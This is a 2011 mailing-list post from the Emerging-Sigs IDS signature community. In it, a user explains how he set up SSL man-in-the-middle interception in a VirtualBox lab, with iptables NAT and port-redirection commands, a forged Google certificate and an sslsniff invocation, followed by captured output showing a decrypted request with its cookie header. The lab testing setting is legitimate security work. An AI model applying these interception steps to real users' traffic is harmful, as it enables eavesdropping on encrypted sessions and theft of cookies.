[Emerging-Sigs] SSL MitM with VirtualBox/iptables/sslsniff

Packet Hack pckthck at gmail.com
Fri Aug 5 10:04:43 EDT 2011


I hope this doesn't get on anyone's nerves since it's not directly
sig related, but I got SSL MitM working with VirtualBox/iptables/sslsniff.

Here's how I did it:

 - Set up a VB instance with Host-only Adapter networking, ensuring
   a default route is set to the VB gateway (mine comes up as
   192.168.56.1)

 - Set up NAT, forwarding, & port 443 redirection to 8443:

   % /sbin/iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

   % /sbin/iptables -A FORWARD -i eth0 -o vboxnet0 -m state \
     --state RELATED,ESTABLISHED -j ACCEPT

   % /sbin/iptables -A FORWARD -i vboxnet0 -o eth0 -j ACCEPT

   % iptables -i vboxnet0 -t nat -A PREROUTING -p tcp \
      --destination-port 443 -j REDIRECT --to-ports 8443

   % echo 1 > /proc/sys/net/ipv4/ip_forward

 - gen a fake ssl cert, for say, google, put it in a dir
 - run sslsniff

   % ./sslsniff -t -c crt/c  -s 8443 -w 443.out

 - profit!

   1311727518 DEBUG sslsniff : Read from Client (*.google.com) :
   GET / HTTP/1.1
   Accept: image/gif, image/jpeg, image/pjpeg, [...]
   Accept-Language: en-us
   User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
   Accept-Encoding: gzip, deflate
   Cookie: PREF=ID=[...]
   Connection: Keep-Alive
   Host: encrypted.google.com

Hopefully I didn't leave out any steps. Happy MitMing!

-- pckthck


More information about the Emerging-sigs mailing list